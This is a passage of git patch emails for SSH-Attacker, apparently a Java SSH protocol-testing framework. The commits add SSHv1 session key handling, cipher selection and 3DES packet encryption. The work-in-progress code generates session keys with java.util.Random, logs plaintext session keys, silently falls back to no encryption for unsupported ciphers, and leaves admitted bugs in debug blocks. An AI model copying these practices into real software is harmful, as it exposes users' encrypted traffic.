EncryptionAlgorithm encryptionAlgorithm; + Chooser chooser = sshContext.getChooser(); + + encryptionAlgorithm = chooser.getSendEncryptionAlgorithm(); + SshContext sshContext = chooser.getContext().getSshContext(); + + KeyExchangeUtil.generateKeySet(sshContext); + + Optional keySet = sshContext.getKeySet(); + + if (!keySet.isPresent()) { + LOGGER.fatal("Keyset is not present, cannot go further"); + throw new RuntimeException(); + } + + AbstractKeySet activeKeySet = sshContext.getPacketLayer().getEncryptorCipher().getKeySet(); + EncryptionAlgorithm activeEncryptionAlgorithm = + sshContext.getPacketLayer().getEncryptorCipher().getEncryptionAlgorithm(); + if (!sshContext.getConfig().getForcePacketCipherChange() + && Objects.equals(activeKeySet, keySet.get()) + && encryptionAlgorithm == activeEncryptionAlgorithm + && (encryptionAlgorithm.getType() == EncryptionAlgorithmType.AEAD)) { + LOGGER.info( + "Key set and algorithms unchanged, not changing active decryption cipher - workflow will continue with old cipher"); + return; + } + + try { + PacketCipher packetCipher = + PacketCipherFactory.getPacketCipher( + sshContext, + keySet.get(), + encryptionAlgorithm, + null, + CipherMode.ENCRYPT); + sshContext.getPacketLayer().updateEncryptionCipher(packetCipher); + + } catch (IllegalArgumentException e) { + LOGGER.warn( + "Caught an exception while trying to update the active {} cipher after handling a new keys message - workflow will continue with old cipher", + "encryption"); + LOGGER.debug(e); + } + + try { + PacketCipher packetCipher = + PacketCipherFactory.getPacketCipher( + sshContext, + keySet.get(), + encryptionAlgorithm, + null, + CipherMode.DECRYPT); + sshContext.getPacketLayer().updateDecryptionCipher(packetCipher); + + } catch (IllegalArgumentException e) { + LOGGER.warn( + "Caught an exception while trying to update the active {} cipher after handling a new keys message - workflow will continue with old cipher", + "decryption"); + LOGGER.debug(e); + } + + LOGGER.info("Set Keys and Algorithms after sending the message"); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java index 99a1d2907..84e72c954 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java @@ -83,9 +83,57 @@ private void prepareEncryptionAlgorithm() { if (!chooser.getContext().getSshContext().getSupportedCipherMethods().isEmpty()) { chosenCipherMethod = chooser.getContext().getSshContext().getSupportedCipherMethods().get(0); + if (chooser.getContext().getSshContext().getSupportedCipherMethods().size() > 1) { + chosenCipherMethod = + chooser.getContext().getSshContext().getSupportedCipherMethods().get(1); + } chooser.getContext().getSshContext().setChosenCipherMethod(chosenCipherMethod); + + // Derive correct Encryption Algorithm + EncryptionAlgorithm encryptionAlgorithm; + switch (chosenCipherMethod) { + case SSH_CIPHER_3DES: + encryptionAlgorithm = EncryptionAlgorithm.TRIPLE_DES_CBC; + break; + case SSH_CIPHER_NONE: + encryptionAlgorithm = EncryptionAlgorithm.NONE; + break; + case SSH_CIPHER_IDEA: + encryptionAlgorithm = + EncryptionAlgorithm.IDEA_CTR; // Wrong, needts to be IDEA_CFB! + break; + case SSH_CIPHER_DES: + encryptionAlgorithm = EncryptionAlgorithm.DES_CBC; + break; + case SSH_CIPHER_ARCFOUR: + encryptionAlgorithm = EncryptionAlgorithm.ARCFOUR; + break; + case SSH_CIPHER_BLOWFISH: + encryptionAlgorithm = EncryptionAlgorithm.BLOWFISH_CBC; + break; + default: + encryptionAlgorithm = EncryptionAlgorithm.NONE; + // Fallback to None if nothing applied, throw Warning. + LOGGER.warn( + "chosen unsupported Encryption-Algorithm {}, fall back to NONE", + chosenCipherMethod); + } + LOGGER.info("Successfulle applied Encryption Algorihm {}", encryptionAlgorithm); + + // Set Server2Client and Client2Server identical because of SSH1 + chooser.getContext() + .getSshContext() + .setEncryptionAlgorithmClientToServer(encryptionAlgorithm); + + chooser.getContext() + .getSshContext() + .setEncryptionAlgorithmServerToClient(encryptionAlgorithm); + getObject().setChosenCipherMethod(chosenCipherMethod); } + LOGGER.info( + "Choose Ciphermethod: {}", + chooser.getContext().getSshContext().getChosenCipherMethod()); } private void prepareProtoclFlags() { @@ -108,6 +156,7 @@ private void prepareProtoclFlags() { private void prepareSessionKey() throws CryptoException { Random random = new Random(); byte[] sessionKey = new byte[32]; + byte[] plainSessionKey; random.nextBytes(sessionKey); byte[] sessionID = getObject().getSshv1SessionID().getValue(); @@ -117,6 +166,9 @@ private void prepareSessionKey() throws CryptoException { sessionKey[i] = (byte) (sesseionByte ^ sessionKey[i++]); } + LOGGER.debug("the Session_key is {}", ArrayConverter.bytesToHexString(sessionKey)); + plainSessionKey = sessionKey; + CustomRsaPublicKey hostPublickey; CustomRsaPublicKey serverPublicKey; @@ -182,8 +234,9 @@ private void prepareSessionKey() throws CryptoException { // Set Sessionkey getObject().setEncryptedSessioKey(sessionKey); - chooser.getContext().getSshContext().setSessionKey(sessionKey); - LOGGER.debug("The Session_key is {}", ArrayConverter.bytesToHexString(sessionKey)); + chooser.getContext().getSshContext().setSessionKey(plainSessionKey); + chooser.getContext().getSshContext().setSharedSecret(plainSessionKey); + LOGGER.debug("The Session_key is {}", ArrayConverter.bytesToHexString(plainSessionKey)); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewKeysMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewKeysMessageHandler.java index 22e35b839..3b3b9f568 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewKeysMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewKeysMessageHandler.java @@ -11,7 +11,7 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; -import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; +import de.rub.nds.sshattacker.core.packet.cipher.keys.AbstractKeySet; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.message.NewKeysMessage; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; @@ -47,7 +47,7 @@ public void adjustContextAfterMessageSent() { private void adjustEncryptionForDirection(boolean receive) { Chooser chooser = sshContext.getChooser(); - Optional keySet = sshContext.getKeySet(); + Optional keySet = sshContext.getKeySet(); if (keySet.isEmpty()) { LOGGER.warn( "Unable to update the active {} cipher after handling a new keys message because key set is missing - workflow will continue with old cipher", @@ -60,7 +60,8 @@ private void adjustEncryptionForDirection(boolean receive) { if (receive) { encryptionAlgorithm = chooser.getReceiveEncryptionAlgorithm(); macAlgorithm = chooser.getReceiveMacAlgorithm(); - KeySet activeKeySet = sshContext.getPacketLayer().getDecryptorCipher().getKeySet(); + AbstractKeySet activeKeySet = + sshContext.getPacketLayer().getDecryptorCipher().getKeySet(); EncryptionAlgorithm activeEncryptionAlgorithm = sshContext.getPacketLayer().getDecryptorCipher().getEncryptionAlgorithm(); MacAlgorithm activeMacAlgorithm = @@ -77,7 +78,8 @@ private void adjustEncryptionForDirection(boolean receive) { } else { encryptionAlgorithm = chooser.getSendEncryptionAlgorithm(); macAlgorithm = chooser.getSendMacAlgorithm(); - KeySet activeKeySet = sshContext.getPacketLayer().getEncryptorCipher().getKeySet(); + AbstractKeySet activeKeySet = + sshContext.getPacketLayer().getEncryptorCipher().getKeySet(); EncryptionAlgorithm activeEncryptionAlgorithm = sshContext.getPacketLayer().getEncryptorCipher().getEncryptionAlgorithm(); MacAlgorithm activeMacAlgorithm = diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/util/KeyExchangeUtil.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/util/KeyExchangeUtil.java index 0b2cd06c1..c80b26765 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/util/KeyExchangeUtil.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/util/KeyExchangeUtil.java @@ -20,7 +20,7 @@ import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.exceptions.MissingExchangeHashInputException; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; +import de.rub.nds.sshattacker.core.packet.cipher.keys.AbstractKeySet; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySetGenerator; import de.rub.nds.sshattacker.core.protocol.transport.message.ExchangeHashSignatureMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.HostKeyMessage; @@ -254,7 +254,7 @@ public static void setSessionId(SshContext context) { * @param context SSH context */ public static void generateKeySet(SshContext context) { - KeySet keySet = KeySetGenerator.generateKeySet(context); + AbstractKeySet keySet = KeySetGenerator.generateKeySet(context); context.setKeySet(keySet); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ActivateEncryptionAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ActivateEncryptionAction.java index 08bf6d6f7..6406c4686 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ActivateEncryptionAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ActivateEncryptionAction.java @@ -14,7 +14,7 @@ import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; -import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; +import de.rub.nds.sshattacker.core.packet.cipher.keys.AbstractKeySet; import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import java.util.Optional; @@ -37,7 +37,7 @@ public ActivateEncryptionAction(String connectionAlias) { public void execute(State state) throws WorkflowExecutionException { SshContext context = state.getSshContext(getConnectionAlias()); Chooser chooser = context.getChooser(); - Optional keySet = context.getKeySet(); + Optional keySet = context.getKeySet(); if (keySet.isEmpty()) { LOGGER.error( "Unable to activate encryption, there is no key set available in the context"); From 8437b98aa9c9abe0963f28ac23a777176fbab574 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Tue, 19 Sep 2023 14:40:01 +0200 Subject: [PATCH 082/176] Implemented 3DES Krypto --- .../core/packet/cipher/PacketSsh1Cipher.java | 40 ++++++++++++++++++- .../ClientSessionKeyMessageHandler.java | 11 +++++ .../parser/ServerPublicKeyMessageParser.java | 4 +- .../ClientSessionKeyMessagePreparator.java | 38 +++++++++++++++--- .../ServerPublicKeyMessagePreparator.java | 15 ++++++- 5 files changed, 99 insertions(+), 9 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java index 62f6f93d7..80196f8d9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java @@ -29,7 +29,8 @@ public class PacketSsh1Cipher extends PacketCipher { private static final Logger LOGGER = LogManager.getLogger(); /** Cipher for encryption / decryption of packets. */ - private final AbstractCipher cipher; + // private final AbstractCipher cipher; + private AbstractCipher cipher; /** * Next IV for packet processing. Might be null if the encryption algorithm does not use an IV. @@ -239,6 +240,43 @@ public void decrypt(BinaryPacketSSHv1 packet) throws CryptoException { "CRC_Checksum: {}", ArrayConverter.bytesToHexString(packet.getCrcChecksum().getValue())); + // ** DEBUG**// + + cipher = + CipherFactory.getCipher( + EncryptionAlgorithm.TRIPLE_DES_CBC, + keySet == null + ? null + : mode == CipherMode.ENCRYPT + ? keySet.getWriteEncryptionKey(getLocalConnectionEndType()) + : keySet.getReadEncryptionKey(getLocalConnectionEndType())); + + nextIv = + mode == CipherMode.ENCRYPT + ? keySet.getWriteIv(getLocalConnectionEndType()) + : keySet.getReadIv(getLocalConnectionEndType()); + + decryptInner(packet); + + parser = new DecryptionParser(packet.getPayload().getValue()); + + packet.setPaddingLength(8 - packet.getLength().getValue() % 8); + packet.setPadding(parser.parseByteArrayField(packet.getPaddingLength().getValue())); + + newPayload = parser.parseByteArrayField(packet.getLength().getValue() - 4); + + packet.setCrcChecksum(parser.parseByteArrayField(4)); + + LOGGER.debug("DEBUGGER"); + LOGGER.debug( + "Padding: {}", ArrayConverter.bytesToHexString(packet.getPadding().getValue())); + LOGGER.debug("Payload: {}", ArrayConverter.bytesToHexString(newPayload)); + LOGGER.debug( + "CRC_Checksum: {}", + ArrayConverter.bytesToHexString(packet.getCrcChecksum().getValue())); + + // **END**// + packet.setCompressedPayload(newPayload); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java index 7bed1ceee..358a91024 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java @@ -225,6 +225,17 @@ private byte[] decryptSessionKey(ClientSessionKeyMessage message) throws CryptoE throw new RuntimeException(e); } + // Set Sessionkey + LOGGER.debug("The Session_key is {}", ArrayConverter.bytesToHexString(sessionKey)); + + byte[] sessionID = sshContext.getSshv1SessionID(); + LOGGER.debug("Session_ID: {}", ArrayConverter.bytesToHexString(sessionID)); + int i = 0; + + for (byte sesseionByte : sessionID) { + sessionKey[i] = (byte) (sesseionByte ^ sessionKey[i++]); + } + // Set Sessionkey LOGGER.debug("The Session_key is {}", ArrayConverter.bytesToHexString(sessionKey)); return sessionKey; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java index 452f589ae..fee5a3c12 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java @@ -136,12 +136,12 @@ private void parseServerKeyBytes(ServerPublicKeyMessage message) { PublicKeyFormat.SSH_RSA, publicKey)); LOGGER.debug( - "Added Public Host Exponent with value {}", + "Added Public Server Exponent with value {}", ArrayConverter.bytesToHexString( message.getServerKey().getPublicKey().getPublicExponent().toByteArray())); LOGGER.debug( - "Added Public Host Modulus with value {}", + "Added Public Server Modulus with value {}", ArrayConverter.bytesToHexString( message.getServerKey().getPublicKey().getModulus().toByteArray())); /* message.setServerKeyByteLenght(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java index 84e72c954..15bbae7b5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java @@ -20,6 +20,7 @@ import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; +import java.util.Arrays; import java.util.List; import java.util.Random; import org.apache.logging.log4j.LogManager; @@ -62,19 +63,37 @@ private void prepareSessionID() { throw new RuntimeException(); } + // DEBUG CODE + if (hostModulus[0] == 0) { + hostModulus = Arrays.copyOfRange(hostModulus, 1, hostModulus.length); + } + // DEBUG CODE + + // DEBUG CODE + if (serverModulus[0] == 0) { + serverModulus = Arrays.copyOfRange(serverModulus, 1, serverModulus.length); + } + // DEBUG CODE + cookie = chooser.getContext().getSshContext().getAntiSpoofingCookie(); + LOGGER.debug("Servermodulus for SessionID: {}", serverModulus); + LOGGER.debug("Hostmodulus for SessionID: {}", hostModulus); + LOGGER.debug("Cookie for SessionID: {}", cookie); + MessageDigest md; try { md = MessageDigest.getInstance("MD5"); } catch (NoSuchAlgorithmException e) { throw new RuntimeException(e); } - md.update(Bytes.concat(serverModulus, hostModulus, cookie)); + md.update(Bytes.concat(hostModulus, serverModulus, cookie)); + // md.update(Bytes.concat(serverModulus, hostModulus, cookie)); byte[] sessionID = md.digest(); LOGGER.debug("Session-ID {}", ArrayConverter.bytesToHexString(sessionID)); getObject().setSshv1SessionID(sessionID); chooser.getContext().getSshContext().setSessionID(sessionID); + chooser.getContext().getSshContext().setSshv1SessionID(sessionID); } private void prepareEncryptionAlgorithm() { @@ -159,15 +178,24 @@ private void prepareSessionKey() throws CryptoException { byte[] plainSessionKey; random.nextBytes(sessionKey); - byte[] sessionID = getObject().getSshv1SessionID().getValue(); + plainSessionKey = sessionKey.clone(); + + // byte[] sessionID = getObject().getSshv1SessionID().getValue(); + byte[] sessionID = chooser.getContext().getSshContext().getSshv1SessionID(); + LOGGER.debug("Session id = {}", ArrayConverter.bytesToHexString(sessionID)); + LOGGER.debug( + "the not XORED Session_key is {}", ArrayConverter.bytesToHexString(sessionKey)); int i = 0; for (byte sesseionByte : sessionID) { sessionKey[i] = (byte) (sesseionByte ^ sessionKey[i++]); } - LOGGER.debug("the Session_key is {}", ArrayConverter.bytesToHexString(sessionKey)); - plainSessionKey = sessionKey; + LOGGER.debug( + "the Plain Session_key is {}", ArrayConverter.bytesToHexString(plainSessionKey)); + + LOGGER.debug("the XORED Session_key is {}", ArrayConverter.bytesToHexString(sessionKey)); + // plainSessionKey = sessionKey; CustomRsaPublicKey hostPublickey; CustomRsaPublicKey serverPublicKey; @@ -236,7 +264,7 @@ private void prepareSessionKey() throws CryptoException { getObject().setEncryptedSessioKey(sessionKey); chooser.getContext().getSshContext().setSessionKey(plainSessionKey); chooser.getContext().getSshContext().setSharedSecret(plainSessionKey); - LOGGER.debug("The Session_key is {}", ArrayConverter.bytesToHexString(plainSessionKey)); + // LOGGER.debug("The Session_key is {}", ArrayConverter.bytesToHexString(plainSessionKey)); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java index c0347b6bb..d54b0bf2f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java @@ -21,6 +21,7 @@ import java.security.NoSuchAlgorithmException; import java.security.interfaces.RSAPrivateKey; import java.security.interfaces.RSAPublicKey; +import java.util.Arrays; import java.util.List; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -221,15 +222,27 @@ private void prepareSessionID() { cookie = chooser.getConfig().getAntiSpoofingCookie(); + // DEBUG CODE + if (hostModulus[0] == 0) { + hostModulus = Arrays.copyOfRange(hostModulus, 1, hostModulus.length); + } + // DEBUG CODE + + LOGGER.debug("Servermodulus for SessionID: {}", serverModulus); + LOGGER.debug("Hostmodulus for SessionID: {}", hostModulus); + LOGGER.debug("Cookie for SessionID: {}", cookie); + MessageDigest md = null; try { md = MessageDigest.getInstance("MD5"); } catch (NoSuchAlgorithmException e) { throw new RuntimeException(e); } - md.update(Bytes.concat(serverModulus, hostModulus, cookie)); + md.update(Bytes.concat(hostModulus, serverModulus, cookie)); + // md.update(Bytes.concat(serverModulus, hostModulus, cookie)); byte[] sessionID = md.digest(); LOGGER.debug("Session-ID {}", ArrayConverter.bytesToHexString(sessionID)); chooser.getContext().getSshContext().setSessionID(sessionID); + chooser.getContext().getSshContext().setSshv1SessionID(sessionID); } } From 9b94c7535edc2f0140ca2820d64792b261ff5af3 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Fri, 22 Sep 2023 15:05:01 +0200 Subject: [PATCH 083/176] Implementing other krypto-algorithms --- .../core/constants/BinaryPacketConstants.java | 1 + .../sshattacker/core/packet/BinaryPacket.java | 1 - .../core/packet/BinaryPacketSSHv1.java | 19 -- .../core/packet/cipher/PacketCipher.java | 2 +- .../core/packet/cipher/PacketMacedCipher.java | 60 +++--- .../core/packet/cipher/PacketSsh1Cipher.java | 70 +------ .../packet/cipher/keys/KeySetGenerator.java | 54 +++++- .../ServerPublicKeyMessageHandler.java | 171 ++++++++---------- .../ClientSessionKeyMessagePreparator.java | 61 +------ .../ServerPublicKeyMessagePreparator.java | 6 + 10 files changed, 171 insertions(+), 274 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/BinaryPacketConstants.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/BinaryPacketConstants.java index 473b7e4fb..6bc164713 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/BinaryPacketConstants.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/BinaryPacketConstants.java @@ -11,6 +11,7 @@ public class BinaryPacketConstants { public static final int LENGTH_FIELD_LENGTH = 4; public static final int PACKET_FIELD_LENGTH = 4; public static final int PADDING_FIELD_LENGTH = 1; + public static final int CRC_FIELD_LENGHT = 4; public static final int DEFAULT_BLOCK_SIZE = 8; public static final int MIN_PADDING_LENGTH = 4; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java index f796899b0..f1aa4c7bb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java @@ -131,7 +131,6 @@ public void setComputations(PacketCryptoComputations computations) { @Override public void prepareComputations() { - LOGGER.info("[bro] Preparing Computation"); if (computations == null) { computations = new PacketCryptoComputations(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java index baa0f573d..ca07e9ed5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java @@ -123,25 +123,6 @@ public void setSequenceNumber(int sequenceNumber) { this.sequenceNumber = ModifiableVariableFactory.safelySetValue(this.sequenceNumber, sequenceNumber); } - /* - @Override - public BinaryPacketPreparator getPacketPreparator( - Chooser chooser, AbstractPacketEncryptor encryptor, PacketCompressor compressor) { - return new BinaryPacketPreparator(chooser, this, encryptor, compressor); - } - - */ - /* @Override - public BinaryPacketParser getPacketParser( - byte[] array, int startPosition, PacketCipher activeDecryptCipher, int sequenceNumber) { - return new BinaryPacketParser(array, startPosition, activeDecryptCipher, sequenceNumber); - }*/ - /* - - @Override - public BinaryPacketSerializer getPacketSerializer() { - return new BinaryPacketSerializer(this); - }*/ public PacketCryptoComputations getComputations() { return computations; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java index b0b64b970..8e5f2b683 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java @@ -135,7 +135,7 @@ protected byte[] calculatePadding(int paddingLength) { return new byte[paddingLength]; } - protected byte calculatePaddingLengthSSHv1(BinaryPacketSSHv1 packet) { + protected byte calculatePaddingLength(BinaryPacketSSHv1 packet) { int lenght = packet.getLength().getValue(); int padding_lenght = 8 - (lenght % 8); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java index c7a7b42d6..3beffd695 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java @@ -88,29 +88,29 @@ public PacketMacedCipher( private void calculateCrcChecksum(BinaryPacketSSHv1 binaryPacket) { CRC crc32 = new CRC(); - /* - byte[] value = - ArrayConverter.concatenate( - binaryPacket.getPadding().getValue(), - binaryPacket.getCompressedPayload().getValue()); - */ - byte[] value = binaryPacket.getCompressedPayload().getValue(); byte[] checksum = ArrayConverter.longToBytes(crc32.calculateCRC(value), 4); binaryPacket.setCrcChecksum(checksum); - LOGGER.debug( - "CRC: " - + ArrayConverter.bytesToRawHexString( - binaryPacket.getCrcChecksum().getValue())); } @Override public void encrypt(BinaryPacketSSHv1 packet) { + if (packet.getComputations() == null) { + LOGGER.warn("Packet computations are not prepared."); + packet.prepareComputations(); + } + PacketCryptoComputations computations = packet.getComputations(); + + if (keySet != null) { + computations.setEncryptionKey( + keySet.getWriteEncryptionKey(getLocalConnectionEndType())); + } + packet.setLength( packet.getCompressedPayload().getValue().length + 4); // +4 for CRC-Checksum - packet.setPaddingLength(calculatePaddingLengthSSHv1(packet)); + packet.setPaddingLength(calculatePaddingLength(packet)); packet.setPadding(calculatePadding(packet.getPaddingLength().getValue())); packet.setCompressedPayload( @@ -119,15 +119,14 @@ public void encrypt(BinaryPacketSSHv1 packet) { calculateCrcChecksum(packet); - packet.setCompressedPayload( + computations.setPlainPacketBytes( ArrayConverter.concatenate( packet.getCompressedPayload().getValue(), packet.getCrcChecksum().getValue())); - - PacketCryptoComputations computations = packet.getComputations(); try { encryptInner(packet); } catch (CryptoException e) { + LOGGER.warn("Exception while encrypting Pz"); throw new RuntimeException(e); } @@ -219,12 +218,11 @@ private void encryptInner(AbstractPacket packet) throws CryptoException { byte[] plainData; if (packet instanceof BinaryPacket) { plainData = ((BinaryPacket) packet).getComputations().getPlainPacketBytes().getValue(); - LOGGER.debug( - "PlainData from Computation: {}", ArrayConverter.bytesToHexString(plainData)); + } else if (packet instanceof BinaryPacketSSHv1) { + plainData = + ((BinaryPacketSSHv1) packet).getComputations().getPlainPacketBytes().getValue(); } else { plainData = packet.getCompressedPayload().getValue(); - LOGGER.debug( - "PlainData from Compression: {}", ArrayConverter.bytesToHexString(plainData)); } if (encryptionAlgorithm.getIVSize() > 0) { @@ -235,6 +233,12 @@ private void encryptInner(AbstractPacket packet) throws CryptoException { PacketCryptoComputations computations = ((BinaryPacket) packet).getComputations(); computations.setIv(iv); iv = computations.getIv().getValue(); + } else if (packet instanceof BinaryPacketSSHv1) { + // Apply modifications to IV (if any) + PacketCryptoComputations computations = + ((BinaryPacketSSHv1) packet).getComputations(); + computations.setIv(iv); + iv = computations.getIv().getValue(); } packet.setCiphertext(cipher.encrypt(plainData, iv)); nextIv = extractNextIv(nextIv, packet.getCiphertext().getOriginalValue()); @@ -250,22 +254,16 @@ public void decrypt(BinaryPacketSSHv1 packet) throws CryptoException { DecryptionParser parser = new DecryptionParser(packet.getPayload().getValue()); - packet.setPaddingLength(8 - packet.getLength().getValue() % 8); + packet.setPaddingLength(calculatePaddingLength(packet)); packet.setPadding(parser.parseByteArrayField(packet.getPaddingLength().getValue())); - byte[] newPayload = parser.parseByteArrayField(packet.getLength().getValue() - 4); - - packet.setCrcChecksum(parser.parseByteArrayField(4)); + byte[] compressedPayload = + parser.parseByteArrayField( + packet.getLength().getValue() - BinaryPacketConstants.CRC_FIELD_LENGHT); - LOGGER.debug("DEBUGGER"); - LOGGER.debug( - "Padding: {}", ArrayConverter.bytesToHexString(packet.getPadding().getValue())); - LOGGER.debug("Payload: {}", ArrayConverter.bytesToHexString(newPayload)); - LOGGER.debug( - "CRC_Checksum: {}", - ArrayConverter.bytesToHexString(packet.getCrcChecksum().getValue())); + packet.setCrcChecksum(parser.parseByteArrayField(BinaryPacketConstants.CRC_FIELD_LENGHT)); - packet.setCompressedPayload(newPayload); + packet.setCompressedPayload(compressedPayload); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java index 80196f8d9..2a5612824 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java @@ -28,7 +28,7 @@ public class PacketSsh1Cipher extends PacketCipher { private static final Logger LOGGER = LogManager.getLogger(); - /** Cipher for encryption / decryption of packets. */ + /** Cipher for encryption / decryption of SSHv1-packets. */ // private final AbstractCipher cipher; private AbstractCipher cipher; @@ -64,20 +64,10 @@ public PacketSsh1Cipher( private void calculateCrcChecksum(BinaryPacketSSHv1 binaryPacket) { CRC crc32 = new 